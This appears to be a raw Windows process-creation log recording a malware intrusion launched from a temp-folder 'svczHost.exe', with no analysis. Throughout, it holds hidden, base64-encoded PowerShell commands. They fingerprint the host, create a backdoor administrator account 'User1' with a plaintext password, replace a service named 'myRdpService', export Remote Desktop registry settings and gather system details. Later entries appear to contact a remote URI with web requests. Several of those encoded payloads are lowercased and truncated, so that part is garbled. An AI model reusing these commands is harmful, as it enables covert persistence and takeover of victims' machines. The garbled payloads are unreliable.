Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc stop "myRdpService"
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService"
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc query myRdpService
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc query myRdpService
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop "myRdpService"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc query myRdpService
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc delete "myRdpService"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net start "myRdpService"
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 start "myRdpService"
Source: C:\Windows\Temp\myRdpService.exe	Process created: C:\Windows\regedit.exe "regedit.exe" /e "C:\Windows\Temp\regBackup.reg" "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService"
Source: C:\Windows\Temp\myRdpService.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "systeminfo \| Select-String \"OS Name\",\"OS Version\";"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\systeminfo.exe "C:\Windows\system32\systeminfo.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=

Source: unknown	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /v /k "powershell.exe -windowstyle hidden -encodedcommand "uwb0ageacgb0ac0auabyag8aywblahmacwagahaabwb3aguacgbzaggazqbsagwaiaatafcaaqbuagqabwb3afmadab5agwazqagaggaaqbkagqazqbuacaalqbbahiazwb1ag0azqbuahqatabpahmadaagacialqbxagkabgbkag8adwbtahqaeqbsaguaiabiagkazabkaguabgaiacwaiaaiac0atgbvaewabwbnag8aigasacaaigatae4abwbqahiabwbmagkabablacialaagacialqbfahgazqbjahuadabpag8abgbqag8ababpagmaeqagaeiaeqbwageacwbzacialaagacialqbfag4aywbvagqazqbkaemabwbtag0ayqbuagqaiabtafeaqgbgaeeargbnaeeasqbbaeeabwbbaeyacwbbafyaqqbcaeyaqqbgagcaqqbwaeeaqqb1aeearqbvaeeavabnaeiarabbaeuaoabbafoaqqbcahaaqqbhadqaqqbsahcaqgbkaeearabvaeeatwbnaeiavgbbaeyauqbbafiazwbbadqaqqbdadqaqqbsahcaqgbgaeeasabraeeavqb3aeiavqbbaegasqbbafmauqbcae8aqqbfagmaqqblaeeaqqbvaeearqbraeeavgb3aeiaeqbbaemaqqbbaesaqqbcagiaqqbgae0aqqblafeaqgb6aeeasabraeeawgbraeiadabbaemanabbafyaqqbcagwaqqbiagcaqqbkaeeaqqb1aeearqbvaeeaygbnaeiaagbbaecaoabbafoaqqbcahaaqqbhadqaqqbaahcaqgbkaeearabvaeeatwbnaeiavgbbaeyauqbbafiazwbbadqaqqbdadqaqqbsahcaqgbsaeeasabraeeavqb3aeiamabbaegasqbbageauqbcahuaqqbhagmaqqblaeeaqgbiaeearqbnaeeaygb3aeiadqbbaegawqbbafoauqbcahkaqqbiafeaqqbyafeaqqa2aeearabvaeeaugbnaeiaeqbbaecaoabbagiauqbcaemaqqbhaeuaqqbjahcaqgbsaeearabzaeeatgbbaeiavabbaegauqbbagmazwbcahaaqqbhadqaqqbaahcaqqbvaeeaqwbjaeeawqbraeiasqbbaeyasqbbae0aqqbcagoaqqbfagcaqqbuafeaqqayaeearqb3aeeazqbraeeanqbbaecabwbbafkazwbbahkaqqbfadqaqqbkagcaqgbpaeeargbjaeeavgbnaeeadwbbaecarqbbafiadwbbaduaqqbhahmaqqbxagcaqgbuaeearabvaeeayqb3aeiayqbbaeyatqbbae8auqbcaggaqqbgag8aqqbrafeaqqa5aeearaawaeeasqbnaeeacabbaemaawbbaesauqbbahaaqqbdadqaqqbrahcaqgbqaeearqa0aeeazabbaeiargbbaeuanabbagqaqqbbahaaqqbdagsaqqaiaa=="" && exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -encodedcommand "uwb0ageacgb0ac0auabyag8aywblahmacwagahaabwb3aguacgbzaggazqbsagwaiaatafcaaqbuagqabwb3afmadab5agwazqagaggaaqbkagqazqbuacaalqbbahiazwb1ag0azqbuahqatabpahmadaagacialqbxagkabgbkag8adwbtahqaeqbsaguaiabiagkazabkaguabgaiacwaiaaiac0atgbvaewabwbnag8aigasacaaigatae4abwbqahiabwbmagkabablacialaagacialqbfahgazqbjahuadabpag8abgbqag8ababpagmaeqagaeiaeqbwageacwbzacialaagacialqbfag4aywbvagqazqbkaemabwbtag0ayqbuagqaiabtafeaqgbgaeeargbnaeeasqbbaeeabwbbaeyacwbbafyaqqbcaeyaqqbgagcaqqbwaeeaqqb1aeearqbvaeeavabnaeiarabbaeuaoabbafoaqqbcahaaqqbhadqaqqbsahcaqgbkaeearabvaeeatwbnaeiavgbbaeyauqbbafiazwbbadqaqqbdadqaqqbsahcaqgbgaeeasabraeeavqb3aeiavqbbaegasqbbafmauqbcae8aqqbfagmaqqblaeeaqqbvaeearqbraeeavgb3aeiaeqbbaemaqqbbaesaqqbcagiaqqbgae0aqqblafeaqgb6aeeasabraeeawgbraeiadabbaemanabbafyaqqbcagwaqqbiagcaqqbkaeeaqqb1aeearqbvaeeaygbnaeiaagbbaecaoabbafoaqqbcahaaqqbhadqaqqbaahcaqgbkaeearabvaeeatwbnaeiavgbbaeyauqbbafiazwbbadqaqqbdadqaqqbsahcaqgbsaeeasabraeeavqb3aeiamabbaegasqbbageauqbcahuaqqbhagmaqqblaeeaqgbiaeearqbnaeeaygb3aeiadqbbaegawqbbafoauqbcahkaqqbiafeaqqbyafeaqqa2aeearabvaeeaugbnaeiaeqbbaecaoabbagiauqbcaemaqqbhaeuaqqbjahcaqgbsaeearabzaeeatgbbaeiavabbaegauqbbagmazwbcahaaqqbhadqaqqbaahcaqqbvaeeaqwbjaeeawqbraeiasqbbaeyasqbbae0aqqbcagoaqqbfagcaqqbuafeaqqayaeearqb3aeeazqbraeeanqbbaecabwbbafkazwbbahkaqqbfadqaqqbkagcaqgbpaeeargbjaeeavgbnaeeadwbbaecarqbbafiadwbbaduaqqbhahmaqqbxagcaqgbuaeearabvaeeayqb3aeiayqbbaeyatqbbae8auqbcaggaqqbgag8aqqbrafeaqqa5aeearaawaeeasqbnaeeacabbaemaawbbaesauqbbahaaqqbdadqaqqbrahcaqgbqaeearqa0aeeazabbaeiargbbaeuanabbagqaqqbbahaaqqbdagsaqqaiaa=="
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -nologo -noprofile -executionpolicy bypass -encodedcommand sqbfafgaiaaoafsavabfafgavaauaeuatgbdae8azabpag4arwbdadoaogbvafqarga4ac4arwbfahqauwbuahiasqboaecakaaoaekavwbyacaakabbafmaeqbzahqazqbtac4avablahgadaauaeuabgbjag8azabpag4azwbdadoaogbvafqarga4ac4arwblahqauwb0ahiaaqbuagcakabbaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoaciayqbiafiamabjaegatqa2aewaeqa5agoaygayae4adgbiafcavgawagearwa5agsawgbtaduaawbaafmaoqbhafoaqqa9ad0aigapackakqapac4aqwbpae4adabfae4adaapacka
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c start /min "" powershell.exe -windowstyle hidden -nologo -noprofile -executionpolicy bypass -encodedcommand jab1ahiaaqagad0aiaaiaggadab0ahaacwa6ac8alwbjag8aywbvag0azqb0aggabwbkagualgbkagualwbmagkababladialwa4ageaoaa0agmamwa2adaaoqazadiamwbkaguangbjagqaoqbjadianqbhadeaoaa1adeazaawagqaywbkadgayqayagyamwbiadaaoqa3adcangbiagyaoabladcazaa0agqanga0adaamgbhadyanwayadaaywaxageazabkadgaoqbhadiamwbkaduazqbkadeamgbladaanqbjagyamgbmaduamwbkadcaygawadeanqbladcangbiagqanqbiadgamgayadmaoqa5adganwbjadaanaa5agqazqbmagiaoqbiaguanwa3adcanqbmadaayga1adaazqaxadmamabkadgazabiaguazabladqanqa4adgayqawadyazqawagiaygawaduanga4agiaywa5agqaywa1ageaoqa1adkamaa1adgazaaxagiaoqa4adcamwayagiayga4agqayqa0agmamaa3agqaygbiaduanga3agyaoqazagyamwa3adaangbkagqangayagyazaayadeazga1aguayqbladeanwayagqanqawadiangbjagqazaa1adianwa5agyaiga7aa0acgakagmabwb1ag4adaagad0aiaaxadaamaa7aa0acganaaoadqakaa0acgbmahuabgbjahqaaqbvag4aiabtaguabgbkacaaewanaaoaiaagacaaiabwageacgbhag0akaagafsauabtae8aygbqaguaywb0af0aiaakagwabwbnae0acwbnacaakqanaaoadqakacaaiaagacaaiwagaemabwbuahyazqbyahqaiabiag8azab5acaadabvacaacwb0ahiaaqbuagcadqakacaaiaagacaajabzahqacgbpag4azwbcag8azab5acaapqagafsacwb0ahiaaqbuagcaxqaoacqababvagcatqbzagcaiab8acaaqwbvag4adgblahiadabuag8alqbkahmabwbuackaowanaaoaiaagacaaiaakagwabwbnae0azqbzahmayqbnaguacwagad0aiabaacgakqa7aa0acgagacaaiaagacqababvagcatqblahmacwbhagcazqbzacaakwa9acaajabzahqacgbpag4azwbcag8azab5adsadqakacaaiaagacaajabsag8azwbnaguacwbzageazwblahmaiaarad0aiaaiac0alqatac0alqatac0alqatac0aiga7aa0acganaaoaiaagacaaiaakaggazqbhagqazqbyahmaiaa9acaaqab7ah0aowanaaoaiaagacaaiaakagsazqb5acaapqagaciaqwbvag4adablag4adaatafqaeqbwaguaiga7aa0acgagacaaiaagacqadgbhagwadqblacaapqagaciayqbwahaababpagmayqb0agkabwbuac8aagbzag8abgaiadsadqakaa0acgagacaaiaagacqaaablageazablahiacwbbacqaawblahkaxqagad0aiaakahyayqbsahuazqa7aa0acgagacaaiaagacqadqbyagkaiaa9acaaigbmae8arwbvafiataaiadsadqakacaaiaagacaadabyahkadqakacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaakagiabwbkahkaiaa9acaajabsag8azwbnaguacwbzageazwblahmaiab8acaaqwbvag4adgblahiadabuag8alqbkahmabwbuadsadqakacaaiaagacaaiaagacaaiaagacaaiaagaekabgb2ag8aawblac0avwblagiaugblaheadqblahmadaagac0avqbyagkaiaakahuacgbpacaalqbnaguadaboag8azaagafaabwbzahqaiaataegazqbhagqazqbyahmaiaakaggazqbhagqazqbyahmaiaataeiabwbkahkaiaakagiabwbkahkadqakacaaiaagacaaiaagacaaiab9aa0acgagacaaiaagacaaiaagacaaywbhahqaywboahsadqakacaaiaagacaaiaagacaaiaagacaaiaagaa0acgagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaanaaoafqanaaoadqakahcaaabpagwazqaoacqaywbvahuabgb0acaalqbnahqaiaawackadqakahsadqakaakadqakaakadabyahkaewanaaoaiaagacaaiaagacaaiaagafmazqbuagqaiaaiagiazqbnagkabgagagqabwb3ag4ababvageazaagacqadqbyagkaiga7aa0acgajaakajabjag8abgb0aguabgb0acaapqagaekabgb2ag8aawblac0avwblagiaugblaheadqblahmadaagac0avqbyagkaiaakahuacgbpacaalqbvahmazqbcageacwbpagmauabhahiacwbpag4azwa7aa0acgagacaaiaagacaaiaagacaajabiahkadablaeeacgbyageaeqagad0aiaakagmabwbuahqazqbuahqalgbjag8abgb0aguabgb0adsadqakacaaiaagacaaiaagacaaiabmag8acgagacgajabpac
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -nologo -noprofile -executionpolicy bypass -encodedcommand jab1ahiaaqagad0aiaaiaggadab0ahaacwa6ac8alwbjag8aywbvag0azqb0aggabwbkagualgbkagualwbmagkababladialwa4ageaoaa0agmamwa2adaaoqazadiamwbkaguangbjagqaoqbjadianqbhadeaoaa1adeazaawagqaywbkadgayqayagyamwbiadaaoqa3adcangbiagyaoabladcazaa0agqanga0adaamgbhadyanwayadaaywaxageazabkadgaoqbhadiamwbkaduazqbkadeamgbladaanqbjagyamgbmaduamwbkadcaygawadeanqbladcangbiagqanqbiadgamgayadmaoqa5adganwbjadaanaa5agqazqbmagiaoqbiaguanwa3adcanqbmadaayga1adaazqaxadmamabkadgazabiaguazabladqanqa4adgayqawadyazqawagiaygawaduanga4agiaywa5agqaywa1ageaoqa1adkamaa1adgazaaxagiaoqa4adcamwayagiayga4agqayqa0agmamaa3agqaygbiaduanga3agyaoqazagyamwa3adaangbkagqangayagyazaayadeazga1aguayqbladeanwayagqanqawadiangbjagqazaa1adianwa5agyaiga7aa0acgakagmabwb1ag4adaagad0aiaaxadaamaa7aa0acganaaoadqakaa0acgbmahuabgbjahqaaqbvag4aiabtaguabgbkacaaewanaaoaiaagacaaiabwageacgbhag0akaagafsauabtae8aygbqaguaywb0af0aiaakagwabwbnae0acwbnacaakqanaaoadqakacaaiaagacaaiwagaemabwbuahyazqbyahqaiabiag8azab5acaadabvacaacwb0ahiaaqbuagcadqakacaaiaagacaajabzahqacgbpag4azwbcag8azab5acaapqagafsacwb0ahiaaqbuagcaxqaoacqababvagcatqbzagcaiab8acaaqwbvag4adgblahiadabuag8alqbkahmabwbuackaowanaaoaiaagacaaiaakagwabwbnae0azqbzahmayqbnaguacwagad0aiabaacgakqa7aa0acgagacaaiaagacqababvagcatqblahmacwbhagcazqbzacaakwa9acaajabzahqacgbpag4azwbcag8azab5adsadqakacaaiaagacaajabsag8azwbnaguacwbzageazwblahmaiaarad0aiaaiac0alqatac0alqatac0alqatac0aiga7aa0acganaaoaiaagacaaiaakaggazqbhagqazqbyahmaiaa9acaaqab7ah0aowanaaoaiaagacaaiaakagsazqb5acaapqagaciaqwbvag4adablag4adaatafqaeqbwaguaiga7aa0acgagacaaiaagacqadgbhagwadqblacaapqagaciayqbwahaababpagmayqb0agkabwbuac8aagbzag8abgaiadsadqakaa0acgagacaaiaagacqaaablageazablahiacwbbacqaawblahkaxqagad0aiaakahyayqbsahuazqa7aa0acgagacaaiaagacqadqbyagkaiaa9acaaigbmae8arwbvafiataaiadsadqakacaaiaagacaadabyahkadqakacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaakagiabwbkahkaiaa9acaajabsag8azwbnaguacwbzageazwblahmaiab8acaaqwbvag4adgblahiadabuag8alqbkahmabwbuadsadqakacaaiaagacaaiaagacaaiaagacaaiaagaekabgb2ag8aawblac0avwblagiaugblaheadqblahmadaagac0avqbyagkaiaakahuacgbpacaalqbnaguadaboag8azaagafaabwbzahqaiaataegazqbhagqazqbyahmaiaakaggazqbhagqazqbyahmaiaataeiabwbkahkaiaakagiabwbkahkadqakacaaiaagacaaiaagacaaiab9aa0acgagacaaiaagacaaiaagacaaywbhahqaywboahsadqakacaaiaagacaaiaagacaaiaagacaaiaagaa0acgagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaanaaoafqanaaoadqakahcaaabpagwazqaoacqaywbvahuabgb0acaalqbnahqaiaawackadqakahsadqakaakadqakaakadabyahkaewanaaoaiaagacaaiaagacaaiaagafmazqbuagqaiaaiagiazqbnagkabgagagqabwb3ag4ababvageazaagacqadqbyagkaiga7aa0acgajaakajabjag8abgb0aguabgb0acaapqagaekabgb2ag8aawblac0avwblagiaugblaheadqblahmadaagac0avqbyagkaiaakahuacgbpacaalqbvahmazqbcageacwbpagmauabhahiacwbpag4azwa7aa0acgagacaaiaagacaaiaagacaajabiahkadablaeeacgbyageaeqagad0aiaakagmabwbuahqazqbuahqalgbjag8abgb0aguabgb0adsadqakacaaiaagacaaiaagacaaiabmag8acgagacgajabpacaapqagadaaowagac
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nologo -noprofile -windowstyle hidden -executionpolicy bypass -encodedcommand zgb1ag4aywb0agkabwbuacaarwblahqalqbjagqazqbuahqaaqb0ahkaewakacaaiaagacaajaboageacgbkaeqacgbpahyazqbzacaapqagaecazqb0ac0avwbtagkatwbiagoazqbjahqaiaataemababhahmacwagafcaaqbuadmamgbfaeqaaqbzagsarabyagkadgblacaafaagafcaaablahiazqatae8aygbqaguaywb0acaaewagacqaxwauae0azqbkagkayqbuahkacablacaalqblaheaiaaiaeyaaqb4aguazaagaggayqbyagqaiabkagkacwbracaabqblagqaaqbhaciaiaatag8acgagacqaxwauae0azqbkagkayqbuahkacablacaalqblaheaiaaiaeyaaqb4aguazaagaggayqbyagqaiabkagkacwbracaabqblagqaaqbhacaalqagafmauwbeaciaiab9aaoajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaa9acaaqaaoackacgbmag8acgblageaywboacaakaakaggayqbyagqarabyagkadgblacaaaqbuacaajaboageacgbkaeqacgbpahyazqbzackaiab7aaoaiaagacaaiaakahmazqbyagkayqbsae4adqbtagiazqbyacaapqagacqaaabhahiazabeahiaaqb2agualgbtaguacgbpageababoahuabqbiaguacgakacaaiaagacaajabtag8azablagwaiaa9acaajaboageacgbkaeqacgbpahyazqauae0abwbkaguabaakacaaiaagacaajabkahiaaqb2aguasqbuagyabwagad0aiaaiafmazqbyagkayqbsacaatgb1ag0aygblahiaogagacqacwblahiaaqbhagwatgb1ag0aygblahialaagae0abwbkaguabaa6acaajabtag8azablagwaigakacaaiaagacaajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaarad0aiaakagqacgbpahyazqbjag4azgbvaaoafqakacqaywbvag0aygbpag4azqbkaekabgbmag8aiaa9acaajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaatagoabwbpag4aiaaiagaacgbgag4aigakacqaywbwahuasqbuagyabwagad0aiabhaguadaatafcabqbpae8aygbqaguaywb0acaalqbdagwayqbzahmaiabxagkabgazadiaxwbqahiabwbjaguacwbzag8acgakacqaywbwahuarablahqayqbpagwacwagad0aiaaiafaacgbvagmazqbzahmabwbyaekazaa6acaajaaoacqaywbwahuasqbuagyabwauafaacgbvagmazqbzahmabwbyaekazaapacwaiaboageabqbladoaiaakacgajabjahaadqbjag4azgbvac4atgbhag0azqapacwaiabnageaeabdagwabwbjagsauwbwaguazqbkadoaiaakacgajabjahaadqbjag4azgbvac4atqbhahgaqwbsag8aywbrafmacablaguazaapacwaiabvag4aaqbxahuazqbjagqaogagacqakaakagmacab1aekabgbmag8algbvag4aaqbxahuazqbjagqakqaiaaoajabhagwababjag4azgbvacaapqagaciajabjag8abqbiagkabgblagqasqbuagyabwbgahiayabuacqaywbwahuarablahqayqbpagwacwaiaaoajabtagqanqagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbtaguaywb1ahiaaqb0ahkalgbdahiaeqbwahqabwbnahiayqbwaggaeqauae0araa1aemacgb5ahaadabvafmazqbyahyaaqbjaguauabyag8adgbpagqazqbyaaoajabiahkadablahmaiaa9acaawwbtahkacwb0aguabqauafqazqb4ahqalgbfag4aywbvagqaaqbuagcaxqa6adoavqbuaeyaoaauaecazqb0aeiaeqb0aguacwaoacqayqbsagwasqbuagyabwapaaoajaboageacwboaeiaeqb0aguacwagad0aiaakag0azaa1ac4aqwbvag0acab1ahqazqbiageacwboacgajabiahkadablahmakqakacqaaabhahmaaaagad0aiabbaeiaaqb0aemabwbuahyazqbyahqazqbyaf0aoga6afqabwbtahqacgbpag4azwaoacqaaabhahmaaabcahkadablahmakqagac0acgblahaababhagmazqagaccalqanaaoaiaagacaaiabyaguadab1ahiabgagacqaaabhahmaaaa7aaoafqakagmazaagaciaqwa6afwavwbpag4azabvahcacwbcafqazqbtahaaiga7aaoajab0aguacwb0acaapqagaecazqb0ac0asqbkaguabgb0agkadab5adsacgakahqazqbzahqaiab8acaatwb1ahqalqbgagkabablacaalqbgagkabablafaayqb0aggaiaaiagqazqb2agkaywblaekazaauahqaeab0aciaiaataeuabgbjag8azabpag4azwagafuavabgadga
